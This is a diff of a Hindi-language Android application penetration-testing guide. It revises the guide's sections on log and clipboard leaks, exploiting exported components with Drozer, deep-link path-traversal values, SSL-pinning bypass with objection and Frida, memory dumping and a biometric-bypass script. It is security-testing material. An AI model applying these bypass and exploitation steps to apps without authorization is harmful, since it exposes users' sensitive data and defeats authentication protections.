> सबसे पहले, आपको एक ऐसा वातावरण चाहिए जहाँ आप एप्लिकेशन और सभी वातावरण (Burp CA प्रमाणपत्र, Drozer और Frida मुख्य रूप से) स्थापित कर सकें। इसलिए, एक रूटेड डिवाइस (अनुकरणीय या नहीं) अत्यधिक अनुशंसित है।
### ऑनलाइन गतिशील विश्लेषण
@ -224,13 +224,13 @@ content-protocol.md
![](<../../images/image (831).png>)
ADB कनेक्शन के लिए धन्यवाद, आप **Drozer** और **Frida** का उपयोग इम्यूलेटर के अंदर कर सकते हैं।
ADB कनेक्शन के लिए धन्यवाद, आप **Drozer** और **Frida** का उपयोग अनुकरणकर्ताओं के अंदर कर सकते हैं।
### स्थानीय गतिशील विश्लेषण
#### एक इम्यूलेटर का उपयोग करना
- [**Android Studio**](https://developer.android.com/studio) (आप **x86** और **arm** उपकरण बना सकते हैं, और [**इस**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**नवीनतम x86** संस्करण **ARM पुस्तकालयों** का समर्थन करते हैं बिना धीमे ARM इम्यूलेटर की आवश्यकता के)।
- [**Android Studio**](https://developer.android.com/studio) (आप **x86** और **arm** उपकरण बना सकते हैं, और [**इस** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**नवीनतम x86** संस्करण **ARM पुस्तकालयों** का समर्थन करते हैं बिना धीमे आर्म इम्यूलेटर की आवश्यकता के)।
- इसे सेट करने के लिए इस पृष्ठ पर सीखें:
{{#ref}}
@ -259,7 +259,7 @@ Genymotion में **गूगल सेवाओं** (जैसे AppStore)
4. **बिल्ड नंबर** पर 7 बार दबाएं।
5. वापस जाएं और आप **डेवलपर विकल्प** पाएंगे।
> एक बार जब आपने एप्लिकेशन स्थापित कर लिया है, तो आपको सबसे पहले इसे आजमाना चाहिए और यह जांचना चाहिए कि यह क्या करता है, यह कैसे काम करता है और इसके साथ सहज हो जाएं।\
> एक बार जब आपने एप्लिकेशन स्थापित कर लिया है, तो आपको सबसे पहले इसे आजमाना चाहिए और यह जांचना चाहिए कि यह क्या करता है, यह कैसे काम करता है और इसके साथ सहज होना चाहिए।\
> मैं सुझाव दूंगा कि **इस प्रारंभिक गतिशील विश्लेषण को MobSF गतिशील विश्लेषण + pidcat का उपयोग करके करें**, ताकि हम **सीख सकें कि एप्लिकेशन कैसे काम करता है** जबकि MobSF **कई** **दिलचस्प** **डेटा** को कैप्चर करता है जिसे आप बाद में देख सकते हैं।
### अनपेक्षित डेटा लीक
@ -269,16 +269,16 @@ Genymotion में **गूगल सेवाओं** (जैसे AppStore)
डेवलपर्स को **डीबगिंग जानकारी** को सार्वजनिक रूप से उजागर करने के प्रति सतर्क रहना चाहिए, क्योंकि इससे संवेदनशील डेटा लीक हो सकता है। एप्लिकेशन लॉग की निगरानी के लिए उपकरण [**pidcat**](https://github.com/JakeWharton/pidcat) और `adb logcat` की सिफारिश की जाती है ताकि संवेदनशील जानकारी की पहचान और सुरक्षा की जा सके। **Pidcat** को इसके उपयोग में आसानी और पठनीयता के लिए पसंद किया जाता है।
> [!WARNING]
> ध्यान दें कि **Android 4.0 से नए संस्करणों** में, **एप्लिकेशन केवल अपने स्वयं के लॉग तक पहुँचने में सक्षम होते हैं**। इसलिए एप्लिकेशन अन्य ऐप्स के लॉग तक पहुँच नहीं सकते।\
> ध्यान दें कि **Android 4.0 से नए संस्करणों में**, **एप्लिकेशन केवल अपने स्वयं के लॉग तक पहुँचने में सक्षम होते हैं**। इसलिए एप्लिकेशन अन्य ऐप्स के लॉग तक पहुँच नहीं सकते।\
> फिर भी, यह अनुशंसा की जाती है कि **संवेदनशील जानकारी को लॉग न करें**
**कॉपी/पेस्ट बफर कैशिंग**
Android का **क्लिपबोर्ड-आधारित** ढांचा ऐप्स में कॉपी-पेस्ट कार्यक्षमता को सक्षम बनाता है, फिर भी यह एक जोखिम प्रस्तुत करता है क्योंकि **अन्य एप्लिकेशन** क्लिपबोर्ड तक **पहुँच** सकते हैं, जिससे संवेदनशील डेटा उजागर हो सकता है। यह महत्वपूर्ण है कि संवेदनशील एप्लिकेशन के अनुभागों के लिए कॉपी/पेस्ट कार्यक्षमता को **अक्षम** किया जाए, जैसे कि क्रेडिट कार्ड विवरण, डेटा लीक को रोकने के लिए।
Android का **क्लिपबोर्ड-आधारित** ढांचा ऐप्स में कॉपी-पेस्ट कार्यक्षमता को सक्षम करता है, फिर भी यह एक जोखिम प्रस्तुत करता है क्योंकि **अन्य एप्लिकेशन** क्लिपबोर्ड तक **पहुँच** सकते हैं, जिससे संवेदनशील डेटा उजागर हो सकता है। यह महत्वपूर्ण है कि संवेदनशील एप्लिकेशन के अनुभागों के लिए कॉपी/पेस्ट कार्यों को **अक्षम** किया जाए, जैसे कि क्रेडिट कार्ड विवरण, डेटा लीक को रोकने के लिए।
**क्रैश लॉग**
यदि एक एप्लिकेशन **क्रैश** होता है और **लॉग** सहेजता है, तो ये लॉग हमलावरों की मदद कर सकते हैं, विशेष रूप से जब एप्लिकेशन को रिवर्स-इंजीनियर नहीं किया जा सकता। इस जोखिम को कम करने के लिए, क्रैश पर लॉगिंग से बचें, और यदि लॉग को नेटवर्क के माध्यम से भेजा जाना चाहिए, तो सुनिश्चित करें कि उन्हें सुरक्षा के लिए SSL चैनल के माध्यम से भेजा जाए।
यदि एक एप्लिकेशन **क्रैश** होता है और **लॉग्स** सहेजता है, तो ये लॉग हमलावरों की सहायता कर सकते हैं, विशेष रूप से जब एप्लिकेशन को रिवर्स-इंजीनियर नहीं किया जा सकता। इस जोखिम को कम करने के लिए, क्रैश पर लॉगिंग से बचें, और यदि लॉग को नेटवर्क के माध्यम से भेजा जाना चाहिए, तो सुनिश्चित करें कि उन्हें सुरक्षा के लिए SSL चैनल के माध्यम से भेजा जाए।
एक पेंटेस्टर के रूप में, **इन लॉग्स पर एक नज़र डालने की कोशिश करें**
@ -288,7 +288,7 @@ Android का **क्लिपबोर्ड-आधारित** ढां
### SQLite DBs
अधिकांश एप्लिकेशन **आंतरिक SQLite डेटाबेस** का उपयोग करके जानकारी सहेजेंगे। पेंटेस्ट के दौरान, बनाए गए **डेटाबेस**, **तालिकाओं** और **स्तंभों** के नामों और सभी **डेटा** को देखें क्योंकि आप **संवेदनशील जानकारी** (जो एक कमजोरी होगी) पा सकते हैं।\
अधिकांश एप्लिकेशन **आंतरिक SQLite डेटाबेस** का उपयोग जानकारी को सहेजने के लिए करेंगे। पेंटेस्ट के दौरान, बनाए गए **डेटाबेस**, **तालिकाओं** और **स्तंभों** के नामों और सभी **डेटा** को देखें क्योंकि आप **संवेदनशील जानकारी** (जो एक कमजोरी होगी) पा सकते हैं।\
डेटाबेस `/data/data/the.package.name/databases` में स्थित होना चाहिए जैसे `/data/data/com.mwr.example.sieve/databases`
यदि डेटाबेस संवेदनशील जानकारी को सहेज रहा है और **एन्क्रिप्टेड है** लेकिन आप एप्लिकेशन के अंदर **पासवर्ड** पा सकते हैं, तो यह अभी भी एक **कमजोरी** है।
@ -297,8 +297,8 @@ Android का **क्लिपबोर्ड-आधारित** ढां
### Drozer (एक्सप्लॉइट गतिविधियाँ, सामग्री प्रदाता और सेवाएँ)
[Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf) से: **Drozer** आपको **एक Android ऐप की भूमिका ग्रहण करने** और अन्य ऐप्स के साथ बातचीत करने की अनुमति देता है। यह **किसी भी चीज़ को कर सकता है जो एक स्थापित एप्लिकेशन कर सकता है**, जैसे Android के इंटर-प्रोसेस संचार (IPC) तंत्र का उपयोग करना और अंतर्निहित ऑपरेटिंग सिस्टम के साथ बातचीत करना।\
Drozer एक उपयोगी उपकरण है **निर्यातित गतिविधियों, निर्यातित सेवाओं और सामग्री प्रदाताओं का शोषण करने के लिए** जैसा कि आप अगले अनुभागों में सीखेंगे।
[Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf) से: **Drozer** आपको **Android ऐप की भूमिका ग्रहण करने** और अन्य ऐप्स के साथ बातचीत करने की अनुमति देता है। यह **किसी भी चीज़ को कर सकता है जो एक स्थापित एप्लिकेशन कर सकता है**, जैसे Android के इंटर-प्रोसेस संचार (IPC) तंत्र का उपयोग करना और अंतर्निहित ऑपरेटिंग सिस्टम के साथ बातचीत करना।\
Drozer निर्यातित गतिविधियों, निर्यातित सेवाओं और सामग्री प्रदाताओं का **शोषण** करने के लिए एक उपयोगी उपकरण है जैसा कि आप अगले अनुभागों में सीखेंगे।
### निर्यातित गतिविधियों का शोषण
@ -307,7 +307,7 @@ Drozer एक उपयोगी उपकरण है **निर्यात
**प्राधिकरण बायपास**
जब एक गतिविधि निर्यातित होती है, तो आप एक बाहरी ऐप से इसके स्क्रीन को बुला सकते हैं। इसलिए, यदि एक गतिविधि जिसमें **संवेदनशील जानकारी** है **निर्यातित** है, तो आप **प्रमाणीकरण** तंत्र को **बायपास** कर सकते हैं **इस तक पहुँचने के लिए।**
जब एक गतिविधि निर्यातित होती है, तो आप इसे एक बाहरी ऐप से उसके स्क्रीन को आमंत्रित कर सकते हैं। इसलिए, यदि एक गतिविधि जिसमें **संवेदनशील जानकारी** है **निर्यातित** है, तो आप **प्रमाणीकरण** तंत्र को **बायपास** कर सकते हैं **इस तक पहुँचने के लिए।**
[**Drozer के साथ निर्यातित गतिविधियों का शोषण कैसे करें, यह जानें।**](drozer-tutorial/#activities)
@ -318,33 +318,33 @@ Drozer एक उपयोगी उपकरण है **निर्यात
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**नोट**: MobSF _**singleTask/singleInstance**_ के उपयोग को `android:launchMode` में एक गतिविधि के रूप में दुर्भावनापूर्ण के रूप में पहचानता है, लेकिन [इस](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750) के कारण, यह स्पष्ट रूप से केवल पुराने संस्करणों (API संस्करण < 21) पर खतरन है
**NOTE**: MobSF _**singleTask/singleInstance**_ के उपयोग को `android:launchMode` में एक गतिविधि के रूप में दुर्भावनापूर्ण के रूप में पहचानता है, लेकिन [इस](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750) के कारण, यह स्पष्ट रूप से केवल पुराने संस्करणों (API संस्करण < 21) पर खतरन है
> [!नोट]
> [!NOTE]
> ध्यान दें कि एक प्राधिकरण बाईपास हमेशा एक कमजोर बिंदु नहीं होता है, यह इस पर निर्भर करेगा कि बाईपास कैसे काम करता है और कौन सी जानकारी उजागर होती है।
**संवेदनशील जानकारी का रिसाव**
**गतिविधियाँ परिणाम भी लौटा सकती हैं**। यदि आप एक निर्यातित और अप्रोटेक्टेड गतिविधि को खोजने में सफल होते हैं जो **`setResult`** विधि को कॉल करती है और **संवेदनशील जानकारी** लौटाती है, तो यह संवेदनशील जानकारी का रिसाव है।
**गतिविधियाँ परिणाम भी लौटा सकती हैं**। यदि आप एक निर्यातित और असुरक्षित गतिविधि को खोजने में सफल होते हैं जो **`setResult`** विधि को कॉल करती है और **संवेदनशील जानकारी** लौटाती है, तो यह संवेदनशील जानकारी का रिसाव है।
#### टैपजैकिंग
#### Tapjacking
यदि टैपजैकिंग को रोका नहीं गया, तो आप निर्यातित गतिविधि का दुरुपयोग कर सकते हैं ताकि **उपयोगकर्ता अप्रत्याशित क्रियाएँ** कर सके। अधिक जानकारी के लिए [**टैपजैकिंग क्या है, लिंक का पालन करें**](./#tapjacking)।
यदि tapjacking को रोका नहीं गया, तो आप निर्यातित गतिविधि का दुरुपयोग कर सकते हैं ताकि **उपयोगकर्ता अप्रत्याशित क्रियाएँ** कर सके। [**Tapjacking क्या है, इसके बारे में अधिक जानकारी के लिए लिंक का पालन करें**](./#tapjacking)।
### सामग्री प्रदाताओं का शोषण - संवेदनशील जानकारी तक पहुँच और हेरफेर करना
### सामग्री प्रदाताओं का शोषण - संवेदनशील जानकारी तक पहुँच और हेरफेर
[**यदि आप सामग्री प्रदाता क्या है, इसे ताज़ा करना चाहते हैं तो इसे पढ़ें।**](android-applications-basics.md#content-provider)\
सामग्री प्रदाता मूल रूप से **डेटा साझा करने** के लिए उपयोग किए जाते हैं। यदि किसी ऐप में उपलब्ध सामग्री प्रदाता हैं, तो आप उनसे **संवेदनशील** डेटा निकालने में सक्षम हो सकते हैं। यह भी **SQL इंजेक्शन** और **पथ ट्रैवर्सल** का परीक्षण करना दिलचस्प है क्योंकि वे कमजोर हो सकते हैं।
सामग्री प्रदाता मूल रूप से **डेटा साझा करने** के लिए उपयोग किए जाते हैं। यदि किसी ऐप में उपलब्ध सामग्री प्रदाता हैं, तो आप उनसे **संवेदनशील** डेटा निकालने में सक्षम हो सकते हैं। यह भी **SQL इंजेक्शन** और **पथ Traversals** का परीक्षण करना दिलचस्प है क्योंकि वे कमजोर हो सकते हैं।
[**ड्रोज़र के साथ सामग्री प्रदाताओं का शोषण कैसे करें, जानें।**](drozer-tutorial/#content-providers)
[**Drozer के साथ सामग्री प्रदाताओं का शोषण कैसे करें, यह जानें।**](drozer-tutorial/#content-providers)
### **सेवाओं का शोषण**
[**यदि आप सेवा क्या है, इसे ताज़ा करना चाहते हैं तो इसे पढ़ें।**](android-applications-basics.md#services)\
याद रखें कि एक सेवा की क्रियाएँ `onStartCommand` विधि में शुरू होती हैं।
एक सेवा मूल रूप से कुछ ऐसा है जो **डेटा प्राप्त कर सकता है**, **प्रसंस्करण** कर सकता है और **एक प्रतिक्रिया** (या नहीं) लौटा सकता है। फिर, यदि कोई एप्लिकेशन कुछ सेवाएँ निर्यात कर रहा है, तो आपको **कोड** की **जांच** करनी चाहिए ताकि यह समझ सकें कि यह क्या कर रहा है और **गोपनीय जानकारी निकालने**, प्रमाणीकरण उपायों को बाईपास करने के लिए इसे **गतिशील रूप से** **परीक्षण** करें...\
[**ड्रोज़र के साथ सेवाओं का शोषण कैसे करें, जानें।**](drozer-tutorial/#services)
एक सेवा मूल रूप से कुछ ऐसा है जो **डेटा प्राप्त कर सकता है**, **प्रसंस्कृत** कर सकता है और **एक प्रतिक्रिया** (या नहीं) लौटा सकता है। फिर, यदि कोई एप्लिकेशन कुछ सेवाएँ निर्यात कर रहा है, तो आपको **कोड** की **जांच** करनी चाहिए ताकि यह समझ सकें कि यह क्या कर रहा है और **गोपनीय जानकारी निकालने**, प्रमाणीकरण उपायों को बाईपास करने के लिए इसे **गतिशील रूप से** **परीक्षण** करें...\
[**Drozer के साथ सेवाओं का शोषण कैसे करें, यह जानें।**](drozer-tutorial/#services)
### **ब्रॉडकास्ट रिसीवर्स का शोषण**
@ -352,16 +352,16 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
याद रखें कि एक ब्रॉडकास्ट रिसीवर की क्रियाएँ `onReceive` विधि में शुरू होती हैं।
एक ब्रॉडकास्ट रिसीवर एक प्रकार के संदेश की प्रतीक्षा करेगा। रिसीवर जिस तरह से संदेश को संभालता है, उसके आधार पर यह कमजोर हो सकता है।\
[**ड्रोज़र के साथ ब्रॉडकास्ट रिसीवर्स का शोषण कैसे करें, जानें।**](./#exploiting-broadcast-receivers)
[**Drozer के साथ ब्रॉडकास्ट रिसीवर्स का शोषण कैसे करें, यह जानें।**](./#exploiting-broadcast-receivers)
### **स्कीमों / डीप लिंक का शोषण**
आप मैन्युअल रूप से डीप लिंक की तलाश कर सकते हैं, MobSF जैसे उपकरणों का उपयोग करके या [इस स्क्रिप्ट](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py) का उपयोग करके।\
आप मैन्युअल रूप से गहरे लिंक की तलाश कर सकते हैं, MobSF जैसे उपकरणों का उपयोग करके या [इस स्क्रिप्ट](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py) का उपयोग करके।\
आप **adb** या एक **ब्राउज़र** का उपयोग करके एक घोषित **स्कीम** को **खोल** सकते हैं:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_ध्यान दें कि आप **पैकेज नाम छोड़ सकते हैं** और मोबाइल स्वचालित रूप से उस ऐप को कॉल करेगा जो उस लिंक को खोलना चाहिए._
_ध्यान दें कि आप **पैकेज नाम को छोड़ सकते हैं** और मोबाइल स्वचालित रूप से उस ऐप को कॉल करेगा जो उस लिंक को खोलना चाहिए._
```markup
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
@ -380,7 +380,7 @@ _ध्यान दें कि आप **पैकेज नाम छोड
**पैरामीटर पथ में**
आपको **यह भी जांचना चाहिए कि क्या कोई डीप लिंक URL के पथ के अंदर पैरामीटर का उपयोग कर रहा है** जैसे: `https://api.example.com/v1/users/{username}` , इस मामले में आप पथ यात्रा को मजबूर कर सकते हैं और कुछ इस तरह पहुंच सकते हैं: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
आपको **यह भी जांचना चाहिए कि क्या कोई डीप लिंक URL के पथ के अंदर एक पैरामीटर का उपयोग कर रहा है** जैसे: `https://api.example.com/v1/users/{username}` , इस मामले में आप एक पथ यात्रा को मजबूर कर सकते हैं जैसे: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
ध्यान दें कि यदि आप एप्लिकेशन के अंदर सही एंडपॉइंट्स पाते हैं, तो आप **Open Redirect** (यदि पथ का एक भाग डोमेन नाम के रूप में उपयोग किया जाता है), **खाता अधिग्रहण** (यदि आप CSRF टोकन के बिना उपयोगकर्ता विवरण को संशोधित कर सकते हैं और कमजोर एंडपॉइंट ने सही विधि का उपयोग किया) और किसी अन्य कमजोरियों का कारण बन सकते हैं। इसके बारे में अधिक [जानकारी यहाँ](http://dphoeniixx.com/2020/12/13-2/) है।
**अधिक उदाहरण**
@ -391,11 +391,11 @@ _ध्यान दें कि आप **पैकेज नाम छोड
- **प्रमाणपत्रों की हमेशा सही तरीके से जांच नहीं की जाती** Android एप्लिकेशनों द्वारा। इन एप्लिकेशनों के लिए चेतावनियों की अनदेखी करना और स्व-हस्ताक्षरित प्रमाणपत्रों को स्वीकार करना या कुछ मामलों में HTTP कनेक्शन का उपयोग करना सामान्य है।
- **SSL/TLS हैंडशेक के दौरान बातचीत कभी-कभी कमजोर होती है**, असुरक्षित सिफर सूट का उपयोग करते हुए। यह कमजोरी कनेक्शन को मैन-इन-द-मिडल (MITM) हमलों के प्रति संवेदनशील बनाती है, जिससे हमलावर डेटा को डिक्रिप्ट कर सकते हैं।
- **निजी जानकारी का लीक होना** एक जोखिम है जब एप्लिकेशन सुरक्षित चैनलों का उपयोग करके प्रमाणीकरण करते हैं लेकिन फिर अन्य लेनदेन के लिए असुरक्षित चैनलों के माध्यम से संचार करते हैं। यह दृष्टिकोण संवेदनशील डेटा, जैसे सत्र कुकीज़ या उपयोगकर्ता विवरण, को दुर्भावनापूर्ण संस्थाओं द्वारा इंटरसेप्शन से बचाने में विफल रहता है।
- **निजी जानकारी का लीक होना** एक जोखिम है जब एप्लिकेशन सुरक्षित चैनलों का उपयोग करके प्रमाणीकरण करते हैं लेकिन फिर अन्य लेनदेन के लिए असुरक्षित चैनलों के माध्यम से संवाद करते हैं। यह दृष्टिकोण संवेदनशील डेटा, जैसे सत्र कुकीज़ या उपयोगकर्ता विवरण, को दुर्भावनापूर्ण संस्थाओं द्वारा इंटरसेप्शन से बचाने में विफल रहता है।
#### प्रमाणपत्र सत्यापन
हम **प्रमाणपत्र सत्यापन** पर ध्यान केंद्रित करेंगे। सुरक्षा बढ़ाने के लिए सर्वर के प्रमाणपत्र की अखंडता की जांच की जानी चाहिए। यह महत्वपूर्ण है क्योंकि असुरक्षित TLS कॉन्फ़िगरेशन और असुरक्षित चैनलों के माध्यम से संवेदनशील डेटा का संचरण महत्वपूर्ण जोखिम पैदा कर सकता है। सर्वर प्रमाणपत्रों को सत्यापित करने और कमजोरियों को संबोधित करने के लिए विस्तृत चरणों के लिए, [**यह संसाधन**](https://manifestsecurity.com/android-application-security-part-10/) व्यापक मार्गदर्शन प्रदान करता है।
हम **प्रमाणपत्र सत्यापन** पर ध्यान केंद्रित करेंगे। सुरक्षा बढ़ाने के लिए सर्वर के प्रमाणपत्र की अखंडता की जांच की जानी चाहिए। यह महत्वपूर्ण है क्योंकि असुरक्षित TLS कॉन्फ़िगरेशन और असुरक्षित चैनलों के माध्यम से संवेदनशील डेटा का संचरण महत्वपूर्ण जोखिम पैदा कर सकता है। सर्वर प्रमाणपत्रों की जांच करने और कमजोरियों को संबोधित करने के लिए विस्तृत कदमों के लिए, [**यह संसाधन**](https://manifestsecurity.com/android-application-security-part-10/) व्यापक मार्गदर्शन प्रदान करता है।
#### SSL पिनिंग
@ -405,21 +405,21 @@ SSL पिनिंग एक सुरक्षा उपाय है जह
HTTP ट्रैफ़िक का निरीक्षण करने के लिए, **प्रॉक्सी टूल का प्रमाणपत्र स्थापित करना आवश्यक है** (जैसे, Burp)। इस प्रमाणपत्र को स्थापित किए बिना, एन्क्रिप्टेड ट्रैफ़िक प्रॉक्सी के माध्यम से दिखाई नहीं दे सकता है। कस्टम CA प्रमाणपत्र स्थापित करने के लिए एक गाइड के लिए, [**यहाँ क्लिक करें**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine)।
**API स्तर 24 और उससे ऊपर** को लक्षित करने वाले एप्लिकेशनों को प्रॉक्सी के CA प्रमाणपत्र को स्वीकार करने के लिए नेटवर्क सुरक्षा कॉन्फ़िग को संशोधित करने की आवश्यकता होती है। एन्क्रिप्टेड ट्रैफ़िक का निरीक्षण करने के लिए यह कदम महत्वपूर्ण है। नेटवर्क सुरक्षा कॉन्फ़िग को संशोधित करने के निर्देशों के लिए, [**इस ट्यूटोरियल का संदर्भ लें**](make-apk-accept-ca-certificate.md)
**API स्तर 24 और उससे ऊपर** को लक्षित करने वाले एप्लिकेशनों को प्रॉक्सी के CA प्रमाणपत्र को स्वीकार करने के लिए नेटवर्क सुरक्षा कॉन्फ़िग को संशोधित करने की आवश्यकता होती है। एन्क्रिप्टेड ट्रैफ़िक का निरीक्षण करने के लिए यह कदम महत्वपूर्ण है। नेटवर्क सुरक्षा कॉन्फ़िग को संशोधित करने के लिए निर्देशों के लिए, [**इस ट्यूटोरियल का संदर्भ लें**](make-apk-accept-ca-certificate.md)
#### SSL पिनिंग को बायपास करना
जब SSL पिनिंग लागू होती है, तो HTTPS ट्रैफ़िक का निरीक्षण करने के लिए इसे बायपास करना आवश्यक हो जाता है। इस उद्देश्य के लिए विभिन्न विधियाँ उपलब्ध हैं:
- स्वचालित रूप से **संशोधित करें** **apk** को **SSL पिनिंग बायपास** करने के लिए [**apk-mitm**](https://github.com/shroudedcode/apk-mitm) के साथ। इस विकल्प का सबसे बड़ा लाभ यह है कि आपको SSL पिनिंग बायपास करने के लिए रूट की आवश्यकता नहीं होगी, लेकिन आपको एप्लिकेशन को हटाना और नए को फिर से स्थापित करना होगा, और यह हमेशा काम नहीं करेगा।
- आप इस सुरक्षा को बायपास करने के लिए **Frida** का उपयोग कर सकते हैं (नीचे चर्चा की गई)। यहाँ Burp+Frida+Genymotion का उपयोग करने के लिए एक गाइड है: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- आप **objection** का उपयोग करके **स्वचालित रूप से SSL पिनिंग बायपास** करने की कोशिश कर सकते हैं:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- आप **MobSF डायनामिक एनालिसिस** का उपयोग करके **स्वचालित रूप से SSL पिनिंग बायपास** करने की कोशिश कर सकते हैं (नीचे समझाया गया)
- यदि आप अभी भी सोचते हैं कि कुछ ट्रैफ़िक है जिसे आप कैप्चर नहीं कर रहे हैं, तो आप **iptables का उपयोग करके ट्रैफ़िक को burp पर अग्रेषित करने** की कोशिश कर सकते हैं। इस ब्लॉग को पढ़ें: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
- स्वचालित रूप से **संशोधित करें** **apk** को **SSL पिनिंग को बायपास** करने के लिए [**apk-mitm**](https://github.com/shroudedcode/apk-mitm) के साथ। इस विकल्प का सबसे बड़ा लाभ यह है कि आपको SSL पिनिंग को बायपास करने के लिए रूट की आवश्यकता नहीं होगी, लेकिन आपको एप्लिकेशन को हटाना और नए को फिर से स्थापित करना होगा, और यह हमेशा काम नहीं करेगा।
- आप **Frida** का उपयोग कर सकते हैं (नीचे चर्चा की गई) इस सुरक्षा को बायपास करने के लिए। यहाँ Burp+Frida+Genymotion का उपयोग करने के लिए एक गाइड है: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- आप **स्वचालित रूप से SSL पिनिंग को बायपास करने** के लिए [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"` का प्रयास कर सकते हैं।
- आप **MobSF डायनामिक एनालिसिस** का उपयोग करके भी **स्वचालित रूप से SSL पिनिंग को बायपास करने** का प्रयास कर सकते हैं (नीचे समझाया गया)
- यदि आप अभी भी सोचते हैं कि कुछ ट्रैफ़िक है जिसे आप कैप्चर नहीं कर रहे हैं, तो आप **iptables का उपयोग करके ट्रैफ़िक को burp की ओर अग्रेषित करने** का प्रयास कर सकते हैं। इस ब्लॉग को पढ़ें: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### सामान्य वेब कमजोरियों की खोज
यह भी महत्वपूर्ण है कि आप एप्लिकेशन के भीतर सामान्य वेब कमजोरियों की खोज करें। इन कमजोरियों की पहचान और शमन के लिए विस्तृत जानकारी इस सारांश के दायरे से परे है लेकिन इसे अन्यत्र व्यापक रूप से कवर किया गया है।
यह भी महत्वपूर्ण है कि आप एप्लिकेशन के भीतर सामान्य वेब कमजोरियों की खोज करें। इन कमजोरियों की पहचान और शमन के बारे में विस्तृत जानकारी इस सारांश के दायरे से परे है लेकिन इसे अन्यत्र व्यापक रूप से कवर किया गया है।
### Frida
@ -431,7 +431,7 @@ HTTP ट्रैफ़िक का निरीक्षण करने क
- Frida के साथ क्रियाओं के लिए कुछ "GUI": [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection Frida के उपयोग को स्वचालित करने के लिए शानदार है: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- आप यहाँ कुछ शानदार Frida स्क्रिप्ट्स पा सकते हैं: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- एंटी-डिबगिंग / एंटी-Frida तंत्रों को बायपास करने के लिए Frida को लोड करने की कोशिश करें जैसा कि [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) में संकेतित है (उपकरण [linjector](https://github.com/erfur/linjector-rs))
- एंटी-डिबगिंग / एंटी-Frida तंत्रों को बायपास करने का प्रयास करें Frida को [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) में इंगित किए गए अनुसार लोड करके (उपकरण [linjector](https://github.com/erfur/linjector-rs))
### **Dump Memory - Fridump**
@ -468,13 +468,13 @@ frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app
```
### **पृष्ठभूमि छवियाँ**
जब आप एक एप्लिकेशन को पृष्ठभूमि में रखते हैं, तो Android **एप्लिकेशन का स्नैपशॉट** संग्रहीत करता है ताकि जब इसे अग्रभूमि में पुनर्प्राप्त किया जाए, तो यह एप्लिकेशन से पहले छवि लोड करना शुरू कर दे, जिससे ऐसा लगता है कि एप्लिकेशन तेजी से लोड हुआ।
जब आप एक एप्लिकेशन को पृष्ठभूमि में डालते हैं, तो Android **एप्लिकेशन का एक स्नैपशॉट** स्टोर करता है ताकि जब इसे अग्रभूमि में पुनर्प्राप्त किया जाए, तो यह एप्लिकेशन से पहले छवि लोड करना शुरू कर दे, जिससे ऐसा लगता है कि एप्लिकेशन तेजी से लोड हुआ।
हालांकि, यदि इस स्नैपशॉट में **संवेदनशील जानकारी** होती है, तो स्नैपशॉट तक पहुँच रखने वाला कोई व्यक्ति उस जानकारी को **चुरा सकता है** (ध्यान दें कि इसे एक्सेस करने के लिए आपको रूट की आवश्यकता है)।
स्नैपशॉट आमतौर पर यहाँ संग्रहीत होते हैं: **`/data/system_ce/0/snapshots`**
स्नैपशॉट आमतौर पर यहाँ स्टोर होते हैं: **`/data/system_ce/0/snapshots`**
Android **FLAG_SECURE** लेआउट पैरामीटर सेट करके **स्क्रीनशॉट कैप्चर को रोकने** का एक तरीका प्रदान करता है। इस ध्वज का उपयोग करके, विंडो की सामग्री को सुरक्षित के रूप में माना जाता है, जिससे यह स्क्रीनशॉट में दिखाई नहीं देती या असुरक्षित डिस्प्ले पर नहीं देखी जा सकती।
Android **FLAG_SECURE** लेआउट पैरामीटर सेट करके **स्क्रीनशॉट कैप्चर को रोकने** का एक तरीका प्रदान करता है। इस फ्लैग का उपयोग करके, विंडो की सामग्री को सुरक्षित के रूप में माना जाता है, जिससे यह स्क्रीनशॉट में दिखाई नहीं देती या असुरक्षित डिस्प्ले पर नहीं देखी जा सकती।
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
